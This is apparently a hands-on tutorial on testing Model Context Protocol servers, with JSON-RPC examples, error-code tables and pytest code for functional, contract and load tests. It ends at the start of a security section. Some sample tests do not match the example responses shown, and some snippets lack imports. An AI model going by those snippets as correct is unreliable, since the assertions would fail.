This comprehensive tutorial is designed for QA Engineers and SDETs who want to master testing the Model Context Protocol (MCP). Whether you're transitioning from REST API testing or expanding your skillset into AI infrastructure, this workshop provides hands-on, production-grade knowledge.
This workshop takes approximately 3-4 hours to complete. Each module builds on the previous one, so we recommend following the sequence.
| Module | Topic | Duration |
|---|---|---|
| Module 1 | Foundations of MCP | 45 min |
| Module 2 | QA & SDET Test Strategy | 60 min |
| Module 3 | Hands-On Project | 75 min |
| Module 4 | Advanced SDET Architecture | 30 min |
| Assessment | Final Quiz | 20 min |
This tutorial emphasizes hands-on practice. You'll find interactive exercises, real code examples, and practical scenarios throughout. Don't just read; experiment with the code and concepts!
Model Context Protocol (MCP) is an open protocol that standardizes how applications provide context to Large Language Models (LLMs). It enables AI applications to securely connect to diverse data sources and tools through a unified interface, solving the fragmentation problem in AI tool integration.
Before MCP, every AI application built custom integrations for each tool, database, or API:
❌ THE OLD WAY:
Claude App → Custom Slack Integration
Claude App → Custom GitHub Integration
Claude App → Custom Database Integration
ChatGPT    → Different Custom Integrations (no reuse)
Problems this created:
✅ WITH MCP:
Any AI App → MCP Protocol → MCP Server (Slack)
Any AI App → MCP Protocol → MCP Server (GitHub)
Any AI App → MCP Protocol → MCP Server (Database)
MCP solves the fundamental scaling problem in AI tool integration:
This architectural shift means you're no longer testing just API endpoints; you're testing a bidirectional protocol with dynamic capability negotiation, persistent sessions, and stateful interactions.
| Aspect | REST/GraphQL | MCP |
|---|---|---|
| Purpose | General API communication | LLM-context delivery |
| Discovery | Static OpenAPI/Schema | Dynamic capability negotiation |
| Session Model | Stateless (REST) | Persistent bidirectional session |
| Tool Schema | Not standardized | JSON Schema for tools |
| Transport | HTTP only | stdio, HTTP+SSE, WebSocket |
| Context Flow | Request → Response | Resources + Tools + Prompts |
MCP Server connects to:
├── Confluence (documentation)
├── JIRA (project tracking)
├── Slack (team communication)
└── Git (code repositories)

AI can query across all systems simultaneously. QA Challenge: Validate cross-system data consistency.
MCP Server exposes tools for:
├── Deploy application
├── Rollback deployment
├── Check logs
└── Monitor metrics

AI orchestrates the entire deployment pipeline. QA Challenge: Test rollback scenarios and error handling.
MCP Server provides access to:
├── CRM data (customer history)
├── Ticketing API (support tickets)
└── Knowledge base (solutions)

AI resolves tickets with full context. QA Challenge: Validate PII handling and security boundaries.
Question: Think about your current testing work. What's one API or system you test that could benefit from MCP standardization?
Consider:
┌─────────────┐              ┌─────────────┐
│  AI Client  │ ◀──────────▶ │  MCP Server │
│  (Claude)   │     MCP      │             │
└─────────────┘   Protocol   └──────┬──────┘
                                    │
           ┌────────────────────────┼───────────────┐
       ┌───▼───┐               ┌────▼────┐     ┌────▼────┐
       │ Tools │               │Resources│     │ Prompts │
       │ • calc│               │ • files │     │ • expl  │
       │ • API │               │ • DB    │     │ • fix   │
       └───────┘               └─────────┘     └─────────┘
MCP supports three transport mechanisms:
| Transport | Use Case | Testing Focus |
|---|---|---|
| stdio | Local processes | Process lifecycle, I/O streams |
| HTTP+SSE | Remote servers | Connection handling, retries |
| WebSocket | Real-time bidirectional | Connection stability, reconnection |
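For the stdio transport, message framing itself is worth a unit test: messages are newline-delimited JSON-RPC, so a raw newline inside a message corrupts the stream. Below is a minimal framing helper you might test in isolation; this is a sketch, and `encode_stdio_message` / `decode_stdio_stream` are our own names, not part of any MCP SDK.

```python
import json

def encode_stdio_message(msg: dict) -> bytes:
    """Frame one JSON-RPC message for the stdio transport (newline-delimited JSON)."""
    line = json.dumps(msg, separators=(",", ":"))
    if "\n" in line:
        # An embedded newline would be read as a message boundary
        raise ValueError("stdio messages must not contain raw newlines")
    return (line + "\n").encode("utf-8")

def decode_stdio_stream(data: bytes) -> list:
    """Split a raw stdio byte stream back into individual JSON-RPC messages."""
    return [json.loads(line) for line in data.decode("utf-8").splitlines() if line]

# Round-trip check: two requests over one stream come back intact and in order
req1 = {"jsonrpc": "2.0", "id": 1, "method": "initialize", "params": {}}
req2 = {"jsonrpc": "2.0", "id": 2, "method": "tools/list"}
stream = encode_stdio_message(req1) + encode_stdio_message(req2)
assert decode_stdio_stream(stream) == [req1, req2]
```

Property-style tests like this catch framing bugs (lost message boundaries, partial reads) before you ever attach a real server process.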
Step 1: Connection Initialization
  Client → Server: Initialize request
  Server → Client: Server capabilities

Step 2: Capability Discovery
  Client → Server: List available tools
  Server → Client: Tool schemas

Step 3: Tool Invocation
  Client → Server: Call tool with parameters
  Server: Execute tool logic
  Server → Client: Return result

Step 4: Error Handling (if needed)
  Server → Client: Error response with details
{
  "jsonrpc": "2.0",
  "id": 1,
  "method": "initialize",
  "params": {
    "protocolVersion": "2024-11-05",
    "capabilities": {
      "roots": {
        "listChanged": true
      },
      "sampling": {}
    },
    "clientInfo": {
      "name": "TestClient",
      "version": "1.0.0"
    }
  }
}
{
  "jsonrpc": "2.0",
  "id": 1,
  "result": {
    "protocolVersion": "2024-11-05",
    "capabilities": {
      "logging": {},
      "prompts": {
        "listChanged": true
      },
      "resources": {
        "subscribe": true,
        "listChanged": true
      },
      "tools": {
        "listChanged": true
      }
    },
    "serverInfo": {
      "name": "ExampleServer",
      "version": "1.0.0"
    }
  }
}
The initialization handshake is critical. Your tests must validate the negotiated protocol version, the declared capabilities, and the server identity (`serverInfo`).
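These checks can be automated with a small validator over the `initialize` response. The following is a sketch; the `validate_initialize_result` helper and its exact rules are our own, derived from the handshake messages shown above.

```python
def validate_initialize_result(response: dict) -> list:
    """Return a list of handshake violations; an empty list means compliant."""
    problems = []
    if response.get("jsonrpc") != "2.0":
        problems.append("jsonrpc field must be exactly '2.0'")
    result = response.get("result")
    if not isinstance(result, dict):
        return problems + ["initialize response must carry a result object"]
    if not result.get("protocolVersion"):
        problems.append("missing protocolVersion")
    if not isinstance(result.get("capabilities"), dict):
        problems.append("capabilities must be an object")
    info = result.get("serverInfo", {})
    if not info.get("name") or not info.get("version"):
        problems.append("serverInfo must include name and version")
    return problems

# The example response above passes; one missing serverInfo does not
ok = {
    "jsonrpc": "2.0", "id": 1,
    "result": {
        "protocolVersion": "2024-11-05",
        "capabilities": {"tools": {"listChanged": True}},
        "serverInfo": {"name": "ExampleServer", "version": "1.0.0"}
    }
}
assert validate_initialize_result(ok) == []

bad = {"jsonrpc": "2.0", "id": 1,
       "result": {"protocolVersion": "2024-11-05", "capabilities": {}}}
assert validate_initialize_result(bad) == ["serverInfo must include name and version"]
```

Returning a list of violations rather than asserting on the first failure gives you a complete picture of a non-compliant server in one test run.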
Scenario: An MCP server connects to three different databases: PostgreSQL, MongoDB, and Redis.
Questions:
Think About: Connection pooling, resource cleanup, graceful degradation
MCP defines three primary primitives that servers can expose:
Definition: Executable functions that the AI can call to perform actions or retrieve computed data.
{
  "name": "calculate_discount",
  "description": "Calculate discounted price based on original price and discount percentage",
  "inputSchema": {
    "type": "object",
    "properties": {
      "original_price": {
        "type": "number",
        "description": "Original price before discount"
      },
      "discount_percent": {
        "type": "number",
        "description": "Discount percentage (0-100)",
        "minimum": 0,
        "maximum": 100
      }
    },
    "required": ["original_price", "discount_percent"]
  }
}
Testing Focus:
Definition: Data sources that provide context to the AI, such as files, database queries, or API responses.
{
"uri": "file:///docs/api-reference.md",
"name": "API Reference Documentation",
"description": "Complete API documentation for the product",
"mimeType": "text/markdown"
}
Testing Focus:
Definition: Reusable prompt templates that guide AI interactions.
{
  "name": "code_review",
  "description": "Review code for bugs and improvements",
  "arguments": [
    {
      "name": "code",
      "description": "Code to review",
      "required": true
    },
    {
      "name": "language",
      "description": "Programming language",
      "required": true
    }
  ]
}
{
"jsonrpc": "2.0",
"id": 2,
"method": "tools/call",
"params": {
"name": "calculate_discount",
"arguments": {
"original_price": 100.00,
"discount_percent": 20
}
}
}
{
"jsonrpc": "2.0",
"id": 2,
"result": {
"content": [ {
"type": "text",
"text": "Discounted price: $80.00 (20% off $100.00)"
}
]
}
}
{
"jsonrpc": "2.0",
"id": 2,
"error": {
"code": -32602,
"message": "Invalid params",
"data": {
"details": "discount_percent must be between 0 and 100, got 150"
}
}
}
| Error Code | Meaning | Test Scenario |
|---|---|---|
| -32700 | Parse error | Send malformed JSON |
| -32600 | Invalid request | Missing required fields |
| -32601 | Method not found | Call non-existent tool |
| -32602 | Invalid params | Wrong parameter types |
| -32603 | Internal error | Server crash simulation |
Error codes must be consistent and predictable. Your test suite should verify that the server returns the correct error code for each failure scenario. Don't just check that an error occurred; validate the specific error code and message.
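A reusable assertion helper keeps every negative test checking the full error shape, not merely "an error happened". A sketch (the helper name is ours; the shape rules follow JSON-RPC 2.0, where a response carries either `result` or `error`, never both):

```python
def assert_jsonrpc_error(response: dict, expected_code: int) -> None:
    """Check both the shape and the specific code of a JSON-RPC error response."""
    assert response.get("jsonrpc") == "2.0"
    assert "error" in response and "result" not in response, \
        "a response must carry either result or error, never both"
    error = response["error"]
    assert error["code"] == expected_code, \
        f"expected error code {expected_code}, got {error['code']}"
    assert isinstance(error.get("message"), str) and error["message"], \
        "error message must be a non-empty string"

# Works against the invalid-params example shown earlier
sample = {
    "jsonrpc": "2.0", "id": 2,
    "error": {
        "code": -32602,
        "message": "Invalid params",
        "data": {"details": "discount_percent must be between 0 and 100, got 150"}
    }
}
assert_jsonrpc_error(sample, -32602)
```

Pair this helper with a parametrized test over the five scenarios in the table above so each failure mode is pinned to its exact code.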
1. Boundary Values
   - Maximum string length
   - Minimum/maximum numbers
   - Empty arrays
   - Null values
2. Type Coercion
   - String "100" vs number 100
   - Boolean true vs string "true"
   - undefined vs null
3. Unicode and Special Characters
   - Emoji in tool names
   - Non-ASCII characters
   - Control characters
4. Concurrent Requests
   - Multiple tool calls simultaneously
   - Race conditions in stateful operations
   - Resource locking
5. Timeout Scenarios
   - Long-running tool execution
   - Network delays
   - Database query timeouts
Consider this tool schema:
{
  "name": "send_email",
  "inputSchema": {
    "type": "object",
    "properties": {
      "to": {
        "type": "string",
        "format": "email"
      },
      "subject": {
        "type": "string",
        "maxLength": 100
      },
      "body": {
        "type": "string"
      },
      "attachments": {
        "type": "array",
        "items": {
          "type": "string"
        },
        "maxItems": 5
      }
    },
    "required": ["to", "subject", "body"]
  }
}
Design 5 test cases:
Hint: Think about email format, length limits, required fields, and array constraints.
Testing an MCP server requires a multi-layered approach. Unlike REST APIs where you primarily test endpoints, MCP testing involves protocol compliance, capability negotiation, and stateful interactions.
What to verify:
Test Case: Duplicate Tool Names
Given: MCP server with two tools named "calculate"
When: Server initializes
Then: Should reject with an error OR rename with a suffix
Expected: Clear error message indicating the duplicate tool name
Critical validations:
| Validation Type | Test Approach | Example |
|---|---|---|
| Type Checking | Pass wrong types | String instead of number |
| Required Fields | Omit required params | Missing "email" field |
| Format Validation | Invalid formats | "not-an-email" for email field |
| Range Validation | Boundary testing | 101 for 0-100 range |
| Pattern Matching | Regex violations | "ABC" for "[0-9]+" pattern |
During initialization, servers declare their capabilities. Test that:
{
  "capabilities": {
    "logging": {},            // Can send logs to client
    "prompts": {              // Can provide prompts
      "listChanged": true     // Notifies on prompt list changes
    },
    "resources": {            // Can provide resources
      "subscribe": true,      // Supports resource subscriptions
      "listChanged": true     // Notifies on resource list changes
    },
    "tools": {                // Can provide tools
      "listChanged": true     // Notifies on tool list changes
    }
  }
}
Test scenarios:
The core functional testing area:
For each tool, test:

✅ Happy Path
- Valid inputs
- Expected outputs
- Correct data types in response

✅ Edge Cases
- Boundary values (min/max)
- Empty inputs
- Null/undefined values
- Special characters

✅ Error Conditions
- Invalid inputs
- Missing required fields
- Type mismatches
- Business logic violations

✅ State Management
- Does the tool modify state?
- Can it be called repeatedly?
- Are state changes idempotent?
Good error handling is predictable, informative, and consistent. Every error should return:
Test how the server handles long-running operations:
Scenario 1: Tool execution exceeds timeout
Given: Tool takes 60s to execute
When: Client timeout is 30s
Then: Client receives timeout error
And: Server should cancel/clean up the operation

Scenario 2: Network timeout
Given: Client-server connection is unstable
When: Request is sent
Then: Implement retry logic OR fail gracefully

Scenario 3: Database query timeout
Given: Tool queries a slow database
When: Query exceeds timeout
Then: Return a specific timeout error
And: Don't crash the server
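Scenario 1 can be reproduced entirely in-process with `asyncio.wait_for`, no real server required. A sketch, where the `call_with_timeout` wrapper and the mapping of a timeout onto error code -32603 are our assumptions for illustration:

```python
import asyncio

async def slow_tool() -> str:
    """Stand-in for a tool whose execution exceeds the client timeout."""
    await asyncio.sleep(1.0)
    return "done"

async def call_with_timeout(coro, timeout: float) -> dict:
    """Wrap a tool call; convert a timeout into a JSON-RPC-style error."""
    try:
        return {"result": await asyncio.wait_for(coro, timeout)}
    except asyncio.TimeoutError:
        # wait_for cancels the underlying task, modeling server-side cleanup
        return {"error": {"code": -32603, "message": "tool execution timed out"}}

# Slow tool against a short timeout: error, not a hang
response = asyncio.run(call_with_timeout(slow_tool(), timeout=0.05))
assert "error" in response and response["error"]["code"] == -32603

# Fast path is unaffected
fast = asyncio.run(call_with_timeout(asyncio.sleep(0, result="ok"), timeout=1.0))
assert fast == {"result": "ok"}
```

The key assertion is the cancellation side: `asyncio.wait_for` cancels the wrapped coroutine, which is the behavior you want to verify on the server (no orphaned work after a client timeout).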
MCP servers must handle multiple simultaneous requests:
| Test Type | Scenario | Expected Behavior |
|---|---|---|
| Parallel Tools | Call 10 different tools simultaneously | All succeed independently |
| Same Tool | Call same tool 10 times concurrently | All execute correctly, no race conditions |
| Resource Lock | Two tools accessing same database | Proper locking, no deadlocks |
| State Modification | Concurrent writes to shared state | Consistent final state |
Questions to answer through testing:
As servers evolve, test that changes don't break existing clients:
Version 1.0:
{
  "name": "get_user",
  "params": {
    "user_id": "string"
  }
}

Version 2.0:
{
  "name": "get_user",
  "params": {
    "user_id": "string",
    "include_metadata": "boolean"  // NEW optional field
  }
}
Test: A V1 client calling a V2 server should still work.
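A simple compatibility check can be automated over the two parameter schemas. This is a sketch using hand-rolled schema maps (our own structure, mirroring the versioned example above): a change is backward compatible if it adds no new required parameters and keeps the type of every existing parameter.

```python
V1_SCHEMA = {
    "properties": {"user_id": {"type": "string"}},
    "required": ["user_id"],
}
V2_SCHEMA = {
    "properties": {
        "user_id": {"type": "string"},
        "include_metadata": {"type": "boolean"},  # NEW optional field
    },
    "required": ["user_id"],
}

def is_backward_compatible(old: dict, new: dict) -> bool:
    """A V1 client keeps working if V2 adds no new required params
    and preserves the type of every V1 param."""
    if not set(new.get("required", [])) <= set(old.get("required", [])):
        return False  # a newly required parameter breaks old callers
    for name, spec in old["properties"].items():
        if new["properties"].get(name, {}).get("type") != spec.get("type"):
            return False  # removed or retyped parameter breaks old callers
    return True

assert is_backward_compatible(V1_SCHEMA, V2_SCHEMA)
```

Running this comparison in CI between the released schema and the candidate schema turns "V1 client still works" from a manual review note into a gate.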
Scenario: You're testing an MCP server that exposes a "weather_forecast" tool.
{
  "name": "weather_forecast",
  "inputSchema": {
    "type": "object",
    "properties": {
      "location": {
        "type": "string"
      },
      "days": {
        "type": "integer",
        "minimum": 1,
        "maximum": 7
      },
      "units": {
        "type": "string",
        "enum": ["celsius", "fahrenheit"]
      }
    },
    "required": ["location", "days"]
  }
}
Your Task: List 10 specific test cases covering:
Functional testing for MCP servers follows a structured approach that goes beyond simple API testing. You're validating protocol compliance, tool behavior, and integration logic.
| Field | Description | Example |
|---|---|---|
| Test ID | Unique identifier | MCP-TC-001 |
| Category | Type of test | Tool Execution |
| Priority | Critical/High/Medium/Low | Critical |
| Preconditions | Setup requirements | Server initialized |
| Test Steps | Detailed actions | 1. Call tool 2. Verify response |
| Test Data | Input parameters | { "price": 100, "discount": 20 } |
| Expected Result | What should happen | Returns discounted price $80 |
| Actual Result | What actually happened | Pass/Fail with details |
| Test ID | Scenario | Input | Expected Output | Type |
|---|---|---|---|---|
| TC-001 | Valid calculation | price: 100, discount: 20 | 80.00 | Positive |
| TC-002 | Zero discount | price: 100, discount: 0 | 100.00 | Boundary |
| TC-003 | 100% discount | price: 100, discount: 100 | 0.00 | Boundary |
| TC-004 | Negative price | price: -50, discount: 20 | Error: Invalid price | Negative |
| TC-005 | Discount > 100 | price: 100, discount: 150 | Error: Invalid discount | Negative |
| TC-006 | Missing field | price: 100 | Error: Missing discount | Negative |
| TC-007 | Wrong type | price: "hundred", discount: 20 | Error: Invalid type | Negative |
| TC-008 | Decimal precision | price: 99.99, discount: 33.33 | 66.66 | Edge Case |
| TC-009 | Very large number | price: 999999999, discount: 50 | 499999999.50 | Edge Case |
| TC-010 | Extra fields | price: 100, discount: 20, extra: "test" | 80.00 (ignore extra) | Edge Case |
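The matrix above translates directly into a table-driven test. Against a live server you would issue `tools/call` requests; here it is sketched against a local reference implementation (our own, for illustration) so the pattern is runnable. TC-006 and TC-010 are protocol-level cases and would be exercised through the JSON-RPC layer instead.

```python
import math

def calculate_discount(price, discount):
    """Reference implementation of the tool's core logic (ours, for illustration)."""
    if not isinstance(price, (int, float)) or isinstance(price, bool):
        raise TypeError("Invalid type for price")
    if price < 0:
        raise ValueError("Invalid price")
    if not 0 <= discount <= 100:
        raise ValueError("Invalid discount")
    return round(price * (1 - discount / 100), 2)

# (test_id, price, discount, expected value or expected exception)
MATRIX = [
    ("TC-001", 100, 20, 80.00),            # positive
    ("TC-002", 100, 0, 100.00),            # boundary
    ("TC-003", 100, 100, 0.00),            # boundary
    ("TC-004", -50, 20, ValueError),       # negative
    ("TC-005", 100, 150, ValueError),      # negative
    ("TC-007", "hundred", 20, TypeError),  # negative
    ("TC-008", 99.99, 33.33, 66.66),       # edge case
    ("TC-009", 999999999, 50, 499999999.50),  # edge case
]

for test_id, price, discount, expected in MATRIX:
    if isinstance(expected, type) and issubclass(expected, Exception):
        try:
            calculate_discount(price, discount)
            raise AssertionError(f"{test_id}: expected {expected.__name__}")
        except expected:
            pass  # correct failure mode
    else:
        got = calculate_discount(price, discount)
        assert math.isclose(got, expected), f"{test_id}: got {got}"
```

Keeping the matrix as data means adding a row to the table and a tuple to the list is the entire cost of a new case.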
For Every Tool Test:

Response Structure
- Correct JSON-RPC format
- Proper ID matching request
- Result or error field (not both)

Data Validation
- Correct data types
- Required fields present
- Enum values valid
- Format specifications met

Error Handling
- Appropriate error code
- Clear error message
- Error details provided
- No stack traces to client

Performance
- Response time < threshold
- No memory leaks
- Proper resource cleanup

Side Effects
- State changes as expected
- Idempotency maintained
- No unintended modifications
# Example: pytest test case
def test_calculate_discount_valid_input():
    """Test discount calculation with valid inputs"""
    request = {
        "jsonrpc": "2.0",
        "id": 1,
        "method": "tools/call",
        "params": {
            "name": "calculate_discount",
            "arguments": {
                "original_price": 100.00,
                "discount_percent": 20
            }
        }
    }

    response = client.send(request)

    assert response["jsonrpc"] == "2.0"
    assert response["id"] == 1
    assert "result" in response
    assert response["result"]["content"][0]["text"] == "Discounted price: $80.00"
def test_calculate_discount_invalid_discount():
    """Test that discount > 100 returns error"""
    request = {
        "jsonrpc": "2.0",
        "id": 2,
        "method": "tools/call",
        "params": {
            "name": "calculate_discount",
            "arguments": {
                "original_price": 100.00,
                "discount_percent": 150  # Invalid!
            }
        }
    }

    response = client.send(request)

    assert "error" in response
    assert response["error"]["code"] == -32602  # Invalid params
    assert "must be between 0 and 100" in response["error"]["message"]
import jsonschema
import pytest

def test_tool_schema_compliance():
    """Verify tool schema is valid JSON Schema"""
    tool_schema = {
        "name": "send_notification",
        "inputSchema": {
            "type": "object",
            "properties": {
                "message": {"type": "string", "maxLength": 500},
                "priority": {"type": "string", "enum": ["low", "medium", "high"]},
                "recipients": {
                    "type": "array",
                    "items": {"type": "string", "format": "email"},
                    "minItems": 1,
                    "maxItems": 10
                }
            },
            "required": ["message", "recipients"]
        }
    }

    # Validate the schema itself is valid JSON Schema
    try:
        jsonschema.Draft7Validator.check_schema(tool_schema["inputSchema"])
    except jsonschema.SchemaError as e:
        pytest.fail(f"Invalid schema: {e}")

    # Test valid input
    valid_input = {
        "message": "Test notification",
        "priority": "high",
        "recipients": ["[email protected]"]
    }
    jsonschema.validate(valid_input, tool_schema["inputSchema"])

    # Test invalid input
    invalid_input = {
        "message": "x" * 501,  # exceeds maxLength
        "recipients": []       # violates minItems
    }
    with pytest.raises(jsonschema.ValidationError):
        jsonschema.validate(invalid_input, tool_schema["inputSchema"])
Tool Specification:
{
  "name": "create_user",
  "inputSchema": {
    "type": "object",
    "properties": {
      "username": {
        "type": "string",
        "pattern": "^[a-z0-9_]{3,20}$"
      },
      "email": {
        "type": "string",
        "format": "email"
      },
      "age": {
        "type": "integer",
        "minimum": 18,
        "maximum": 120
      },
      "role": {
        "type": "string",
        "enum": ["user", "admin", "moderator"]
      }
    },
    "required": ["username", "email"]
  }
}
Task: Create a complete test matrix with:
Think about: Pattern matching, email validation, integer boundaries, enum values, required fields
Contract testing verifies that the MCP server adheres to its published interface contract. Unlike functional testing (which tests behavior), contract testing ensures the API structure, data types, and protocol compliance remain consistent across versions.
Contract tests answer: "Does the server do what it promised in its schema?"
import jsonschema
import pytest

def test_tool_list_contract():
    """Verify tools/list response matches expected contract"""
    # Expected contract for tools/list response
    expected_schema = {
        "type": "object",
        "properties": {
            "jsonrpc": {"const": "2.0"},
            "id": {"type": ["number", "string"]},
            "result": {
                "type": "object",
                "properties": {
                    "tools": {
                        "type": "array",
                        "items": {
                            "type": "object",
                            "properties": {
                                "name": {"type": "string"},
                                "description": {"type": "string"},
                                "inputSchema": {"type": "object"}
                            },
                            "required": ["name", "inputSchema"]
                        }
                    }
                },
                "required": ["tools"]
            }
        },
        "required": ["jsonrpc", "id", "result"]
    }

    # Make actual request
    response = client.list_tools()

    # Validate against contract
    try:
        jsonschema.validate(response, expected_schema)
    except jsonschema.ValidationError as e:
        pytest.fail(f"Contract violation: {e.message}")
Snapshot testing captures the current API response and compares future responses against it. This catches unintended changes.
import json
import pytest

def test_calculate_discount_response_snapshot(snapshot):
    """Ensure response structure hasn't changed"""
    request = {
        "jsonrpc": "2.0",
        "id": 1,
        "method": "tools/call",
        "params": {
            "name": "calculate_discount",
            "arguments": {"original_price": 100, "discount_percent": 20}
        }
    }

    response = client.send(request)

    # Remove dynamic fields for comparison
    response_snapshot = {
        "jsonrpc": response["jsonrpc"],
        "id": response["id"],
        "result": {"content": response["result"]["content"]}
    }

    # Compare with stored snapshot
    snapshot.assert_match(
        json.dumps(response_snapshot, indent=2),
        "discount_response.json"
    )
| Change Type | Breaking? | Contract Test Strategy |
|---|---|---|
| Add new tool | ✅ No | Verify tool list grows |
| Remove existing tool | ❌ Yes | Block in CI/CD |
| Add optional parameter | ✅ No | Verify backward compatibility |
| Add required parameter | ❌ Yes | Block in CI/CD |
| Change parameter type | ❌ Yes | Block in CI/CD |
| Change error code | ❌ Yes | Version bump required |
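The "Block in CI/CD" rows in the table can be enforced with a schema diff run in the pipeline. A sketch, comparing two `{tool_name: inputSchema}` maps; the function name and the exact set of rules (removed tools, new required params, changed types) are our own distillation of the table:

```python
def detect_breaking_changes(old_tools: dict, new_tools: dict) -> list:
    """List breaking changes between two tool-schema maps.

    A CI gate fails the build whenever this list is non-empty.
    """
    breaking = []
    for name, old_schema in old_tools.items():
        if name not in new_tools:
            breaking.append(f"removed tool: {name}")
            continue
        new_schema = new_tools[name]
        old_req = set(old_schema.get("required", []))
        new_req = set(new_schema.get("required", []))
        for param in sorted(new_req - old_req):
            breaking.append(f"{name}: new required parameter '{param}'")
        for param, spec in old_schema.get("properties", {}).items():
            new_spec = new_schema.get("properties", {}).get(param)
            if new_spec and new_spec.get("type") != spec.get("type"):
                breaking.append(f"{name}: parameter '{param}' changed type")
    return breaking

v1 = {"get_user": {"properties": {"user_id": {"type": "string"}},
                   "required": ["user_id"]}}
# Additive change: new optional param and a new tool
v2_ok = {"get_user": {"properties": {"user_id": {"type": "string"},
                                     "include_metadata": {"type": "boolean"}},
                      "required": ["user_id"]},
         "new_tool": {"properties": {}, "required": []}}
# Breaking change: new required param and a retyped param
v2_bad = {"get_user": {"properties": {"user_id": {"type": "integer"}},
                       "required": ["user_id", "tenant"]}}

assert detect_breaking_changes(v1, v2_ok) == []
assert len(detect_breaking_changes(v1, v2_bad)) == 2
```

Note that this sketch does not cover the "change error code" row; error-code contracts are usually pinned with the parametrized error tests from earlier.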
In consumer-driven testing, clients define their expectations (contracts), and the server must satisfy them.
# consumer_contract.yaml
interactions:
  - description: Calculate discount for valid input
    request:
      method: tools/call
      params:
        name: calculate_discount
        arguments:
          original_price: 100
          discount_percent: 20
    response:
      status: success
      body:
        matchingRules:
          "$.result.content[0].type":
            match: "type"
            value: "string"
          "$.result.content[0].text":
            match: "regex"
            regex: "Discounted price: \\$\\d+\\.\\d{2}"
Scenario: You're testing a "currency_converter" tool.
{
  "name": "currency_converter",
  "inputSchema": {
    "type": "object",
    "properties": {
      "amount": {
        "type": "number",
        "minimum": 0
      },
      "from_currency": {
        "type": "string",
        "pattern": "^[A-Z]{3}$"
      },
      "to_currency": {
        "type": "string",
        "pattern": "^[A-Z]{3}$"
      }
    },
    "required": ["amount", "from_currency", "to_currency"]
  }
}
Task: Write a JSON Schema that validates the response structure for this tool. Consider:
Performance testing validates that your MCP server can handle expected load while maintaining acceptable response times and resource usage.
| Metric | Description | Target |
|---|---|---|
| Response Time | Time from request to response | < 100ms (p95) |
| Throughput | Requests per second | 100+ RPS |
| Latency (p99) | 99th percentile response time | < 500ms |
| Error Rate | Failed requests percentage | < 0.1% |
| CPU Usage | Server CPU consumption | < 70% |
| Memory Usage | RAM consumption | No leaks |
Test how many requests the server can handle per second:
import asyncio
import time

async def load_test_throughput():
    """Test server throughput with concurrent requests"""
    num_requests = 1000

    async def make_request():
        request = {
            "jsonrpc": "2.0",
            "id": 1,
            "method": "tools/call",
            "params": {
                "name": "calculate_discount",
                "arguments": {"original_price": 100, "discount_percent": 20}
            }
        }
        return await client.send_async(request)

    # Execute concurrent requests
    start_time = time.time()
    tasks = [make_request() for _ in range(num_requests)]
    results = await asyncio.gather(*tasks, return_exceptions=True)
    duration = time.time() - start_time

    # Calculate metrics
    successful = sum(1 for r in results if not isinstance(r, Exception))
    failed = num_requests - successful
    throughput = num_requests / duration

    print(f"Total requests: {num_requests}")
    print(f"Successful: {successful}")
    print(f"Failed: {failed}")
    print(f"Duration: {duration:.2f}s")
    print(f"Throughput: {throughput:.2f} req/s")

    assert throughput >= 100, f"Throughput {throughput} below target"
    assert failed / num_requests < 0.001, "Error rate too high"
import numpy as np

def test_latency_percentiles():
    """Measure response time distribution"""
    num_samples = 100
    response_times = []

    for i in range(num_samples):
        start = time.time()
        response = client.send({
            "jsonrpc": "2.0",
            "id": i,
            "method": "tools/call",
            "params": {
                "name": "calculate_discount",
                "arguments": {"original_price": 100, "discount_percent": 20}
            }
        })
        end = time.time()
        response_times.append((end - start) * 1000)  # convert to ms

    # Calculate percentiles
    p50 = np.percentile(response_times, 50)
    p95 = np.percentile(response_times, 95)
    p99 = np.percentile(response_times, 99)

    print("Response Time Distribution:")
    print(f"  p50 (median): {p50:.2f}ms")
    print(f"  p95: {p95:.2f}ms")
    print(f"  p99: {p99:.2f}ms")

    # Assertions
    assert p95 < 100, f"p95 latency {p95}ms exceeds 100ms target"
    assert p99 < 500, f"p99 latency {p99}ms exceeds 500ms target"
def test_concurrent_same_tool():
    """Test calling the same tool concurrently"""
    num_concurrent = 20

    with ThreadPoolExecutor(max_workers=num_concurrent) as executor:
        futures = []
        for i in range(num_concurrent):
            future = executor.submit(client.send, {
                "jsonrpc": "2.0",
                "id": i,
                "method": "tools/call",
                "params": {
                    "name": "calculate_discount",
                    "arguments": {
                        "original_price": 100 + i,
                        "discount_percent": 20
                    }
                }
            })
            futures.append(future)

        # Wait for all to complete
        results = [f.result(timeout=10) for f in futures]

    # Verify all succeeded
    for result in results:
        assert "result" in result, "Request failed"
        assert "error" not in result


def test_concurrent_different_tools():
    """Test calling different tools concurrently"""
    tools = ["calculate_discount", "currency_converter", "weather_forecast"]

    with ThreadPoolExecutor(max_workers=len(tools)) as executor:
        futures = {executor.submit(call_tool, tool): tool for tool in tools}
        for future in futures:
            tool_name = futures[future]
            try:
                result = future.result(timeout=5)
                assert "result" in result
            except Exception as e:
                pytest.fail(f"Tool {tool_name} failed: {e}")
Test 1: Memory Leak Detection
- Monitor memory usage over 1000+ requests
- Memory should remain stable
- No continuous growth pattern

Test 2: Connection Pool Exhaustion
- Open 100+ concurrent connections
- Verify server handles gracefully
- Check for connection timeout errors

Test 3: Large Payload Handling
- Send tool calls with 1 MB+ parameters
- Verify server doesn't crash
- Check memory cleanup after processing

Test 4: Rapid Connect/Disconnect
- Connect and disconnect 50 times rapidly
- Check for resource leaks
- Verify cleanup happens correctly
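Test 1 can be sketched with the standard-library `tracemalloc` module. The `handle_request` stand-in below replaces a real tool invocation (a leaky implementation would, for example, append each payload to a global cache), and the 64 KB slack is an arbitrary tolerance of ours:

```python
import tracemalloc

def handle_request(payload: str) -> str:
    """Stand-in for a tool invocation; retains nothing between calls."""
    return payload.upper()

def allocated_after(n_requests: int) -> int:
    """Bytes still allocated by traced Python code after n requests complete."""
    for _ in range(n_requests):
        handle_request("x" * 1024)
    current, _peak = tracemalloc.get_traced_memory()
    return current

tracemalloc.start()
baseline = allocated_after(1000)
after_more = allocated_after(1000)
tracemalloc.stop()

# Stable memory: another 1000 requests should not grow the footprint meaningfully
assert after_more <= baseline + 64_000, f"possible leak: {baseline} -> {after_more}"
```

Against a real server you would instead sample the server process's RSS between batches; the pattern (baseline batch, second batch, bounded growth assertion) is the same.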
Scenario: Your MCP server will be used by 100 concurrent AI agents, each making 10 tool calls per minute.
Calculate:
Design: Write pseudocode for a load test that validates this scenario.
Security testing is critical for MCP servers because they often have access to sensitive data, APIs, and can execute arbitrary operations. As a QA engineer, you must validate security boundaries.
MCP servers are privileged components in AI systems. A compromised server can leak data, corrupt systems, or enable unauthorized actions. Security testing is not optional.
